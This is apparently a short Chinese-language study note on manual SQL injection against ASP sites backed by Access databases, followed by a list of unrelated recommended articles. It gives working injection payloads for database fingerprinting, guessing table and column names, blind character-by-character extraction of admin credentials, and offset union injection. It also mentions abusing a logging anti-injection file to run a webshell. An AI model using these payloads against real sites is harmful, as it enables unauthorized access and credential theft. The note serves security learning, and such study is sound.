Access数据库

I_WORM2024-04-09 14:48

  • access是没有数据库的;只有表

  • 流程

    • 判断数据库类型--->判断表名----> 判断列名---->判断列名长度(列中第一条记录数据长度)---->读取数据

  • asp网站常用数据库:access和mssql数据库

  • 判断数据库

    • 如果有msysobjects则是access数据库;如果有sysobjects则是sqlsever数据库
    • and exists (select * from msysobjects)>0 access
    • and exists (select * from sysobjects)>0 sqlserver

  • 查表

    • and exists (select * from 表名)

  • 查列名

    • and exists (select 列名 from 表名)

  • 判断列名长度

    • and (select top 1 len(列名) from 表名)>5 :列名是否大于5

  • 逐字符爆破

    • and (select top 1 asc(mid(user,1,1)) from admin)=97
    • asc() 返回字符的ascii码
    • top 1 :只返回最上面一条数据

  • 偏移注入(需要结合联合查询)

    • 联合查询补充字段数=当前表的字段数-查询表的字段数*N
    • union select 1,2,3,4,5,,,* from admin_user :*代表了admin_user的总字段数的倍数

  • 通用性防注入

    • 将输入的行为存放到sqlin.asp文件中;类似于日志
    • 该操作会导致文件木马程序的执行;相当于文件上传了
相关推荐
液态不合群23 分钟前
【面试题】MySQL 的索引下推是什么?
数据库·mysql
2301_7903009624 分钟前
Python深度学习入门:TensorFlow 2.0/Keras实战
jvm·数据库·python
Code blocks1 小时前
SpringBoot从0-1集成KingBase数据库
数据库
程序员敲代码吗2 小时前
用Python生成艺术:分形与算法绘图
jvm·数据库·python
未来的旋律~2 小时前
sqlilabs注入靶场搭建与sql语句
数据库·sql
一个天蝎座 白勺 程序猿2 小时前
KingbaseES查询逻辑优化深度解析:从子查询到语义优化的全链路实践
开发语言·数据库·kingbasees·金仓数据库
我真的是大笨蛋3 小时前
InnoDB行级锁解析
java·数据库·sql·mysql·性能优化·数据库开发
山茶花.4 小时前
SQL注入总结
数据库·sql·oracle
m0_736919104 小时前
超越Python:下一步该学什么编程语言?
jvm·数据库·python
m0_748229994 小时前
ThinkPHP快速入门:从零到实战
c语言·开发语言·数据库·学习
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Clawdbot 中文汉化版 接入微信、飞书04一种新的LCA算法05【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)06Claude Code Skills 实用使用手册07在Trae中使用Pencil MCP08零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程09UV安装并设置国内源10struts2 XML外部实体注入漏洞复现(CVE-2025-68493)